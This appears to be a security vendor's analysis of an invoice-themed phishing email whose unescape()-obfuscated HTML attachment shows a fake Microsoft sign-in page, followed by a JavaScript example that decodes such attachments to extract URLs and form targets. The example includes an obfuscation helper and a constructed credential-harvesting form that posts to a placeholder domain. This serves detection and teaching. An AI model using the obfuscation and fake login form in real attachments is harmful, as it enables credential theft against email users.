In this attack, a company executive received an email claiming to contain an invoice for training. The email was configured to hide the sender's email address, and the sending display name was set to "I N VOICE-176152," which included hidden encoded characters. An analysis of the email headers indicated that the email was sent from a compromised external domain.

[Figure: Training Invoice Phishing Email]

Attached to the email was an HTML file whose name matched the invoice number referenced in the email subject. The source code of the HTML attachment was obfuscated with the JavaScript unescape() function, so the real page markup existed only as percent-encoded strings that are decoded and written into the document at runtime. Had the recipient opened the file, a new browser window would have appeared that initially indicated they were being directed "to your organization's sign-in page." After a few seconds, the page would have reloaded to display a fake Microsoft login page pre-filled with the recipient's email address.

[Figure: Training Invoice Phishing Page 1]
[Figure: Training Invoice Phishing Page 2]

How Does This Attack Bypass Email Defenses?

This attack contained hidden encoded characters in the display name, which prevents threat detection tools that rely on matching known malicious text strings from identifying the email as a threat. Because the sender's email address was hidden, a reputation check could not compare it against known malicious accounts. Because the attached file's source code was obfuscated, a basic scan of the raw file for malicious artifacts, such as URLs, would find nothing: the URLs only exist after the encoded strings are decoded.

How Can This Attack Be Detected?

HTML attachments are commonly used to deliver phishing payloads without including the malicious content in the email body itself, and obfuscated source code is a common tactic in such attachments. An in-depth analysis of the file, which decodes the obfuscated layer rather than simply scanning the raw source code, can surface the malicious artifacts that a raw scan misses. The absence of a sending email address is itself a strong signal of a malicious source. A holistic detection system that can extract and analyze URLs from email attachments is required to assess the intent of any links, and to combine that with the other signals acquired through content analysis in order to determine whether the email is malicious.
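The following is an added example, not code from the original page or from the attack itself, showing what "in-depth analysis rather than scanning the raw source" means for an unescape()-obfuscated HTML attachment like the one described above. It statically locates every string passed to unescape(), decodes the %XX and %uXXXX escapes without ever executing the attachment, and then extracts URLs, the form action, the pre-filled email address, and the delayed redirect from the decoded layer. The sample attachment, the domains (example.invalid), the email address, and the obfuscate() helper used to build it are all constructed for this example.

```javascript
// Added example: static extraction of artifacts from an unescape()-obfuscated
// HTML attachment, without executing it. The attachment, the domains and the
// email address below are constructed for this example; they are not the real
// file from the attack described above.

// Decode the %XX and %uXXXX escapes that JavaScript's unescape() accepts.
// Implemented here rather than calling unescape() so the logic is visible and
// so nothing from the attachment is ever evaluated.
function decodeUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u4, x2) =>
    String.fromCharCode(parseInt(u4 !== undefined ? u4 : x2, 16)));
}

// Pull every string literal passed to unescape( ... ) out of the raw source.
function findUnescapeLiterals(src) {
  const out = [];
  const re = /unescape\(\s*(['"])([^'"]*)\1\s*\)/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[2]);
  return out;
}

// Indicators worth surfacing from the decoded layer: absolute URLs, form
// actions, a pre-filled email address, and a scripted redirect.
function extractIndicators(html) {
  const urls = html.match(/https?:\/\/[^\s"'<>]+/g) || [];
  const formActions = [...html.matchAll(/action\s*=\s*["']([^"']+)["']/gi)].map(m => m[1]);
  const emailMatch = html.match(/value\s*=\s*["']([^"'\s@]+@[^"'\s]+)["']/i);
  const redirectMatch = html.match(/location(?:\.href)?\s*=\s*["']([^"']+)["']/);
  return {
    urls: [...new Set(urls)],
    formActions,
    prefilledEmail: emailMatch ? emailMatch[1] : null,
    redirect: redirectMatch ? redirectMatch[1] : null,
  };
}

// Compare what a raw scan sees with what the decoded layer reveals.
function analyzeAttachment(src) {
  const rawUrls = src.match(/https?:\/\/[^\s"'<>]+/g) || [];
  const decoded = findUnescapeLiterals(src).map(decodeUnescape).join('\n');
  return { rawUrls, decoded, indicators: extractIndicators(decoded) };
}

// --- constructed sample attachment (not the real attack file) -------------

// Encode every character, mixing %XX and %uXXXX forms, so a scanner looking
// for the plaintext strings in the raw file finds nothing.
function obfuscate(text) {
  return [...text].map((ch, i) => {
    const code = ch.charCodeAt(0).toString(16).toUpperCase();
    return i % 3 === 0 ? '%u' + code.padStart(4, '0') : '%' + code.padStart(2, '0');
  }).join('');
}

const HIDDEN_PAGE = [
  '<html><body>',
  "<p>Redirecting to your organization's sign-in page...</p>",
  '<script>setTimeout(function(){ location.href = "https://login.example.invalid/auth?login=jane.doe@example.com"; }, 3000);</script>',
  '<form action="https://collect.example.invalid/post.php" method="post">',
  '<input type="email" name="login" value="jane.doe@example.com">',
  '<input type="password" name="passwd"></form>',
  '</body></html>',
].join('\n');

const SAMPLE_ATTACHMENT =
  '<html><body><script>document.write(unescape("' + obfuscate(HIDDEN_PAGE) + '"));</script></body></html>';

const report = analyzeAttachment(SAMPLE_ATTACHMENT);
console.log('URLs visible in raw source:', report.rawUrls.length);
console.log('URLs after decoding:', report.indicators.urls);
console.log('Form posts to:', report.indicators.formActions);
console.log('Pre-filled email:', report.indicators.prefilledEmail);
console.log('Delayed redirect to:', report.indicators.redirect);
```

Run with `node` and the raw scan reports zero URLs while the decoded layer exposes the credential-collection endpoint, the redirect target, and the victim's address. In a real pipeline the decoding step would be iterated, since attackers often nest unescape() inside atob() or string-reversal layers, and any URL found should be fed into the same reputation and intent checks applied to links in the email body.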

What are the Risks of This Attack?

If an employee entered credentials into the phishing page, attackers would have full access to their email account, which they could then use to search for sensitive information or as a launch point for further attacks on the employee's coworkers, customers, or vendors.

Analysis Overview

Vector: Payload-based
Goal: Credential Theft
Tactic: Hidden Sender Address; Obfuscated Email Content; File Source Code Obfuscation
Theme: Fake Invoice
Impersonated Party: External Party - Other
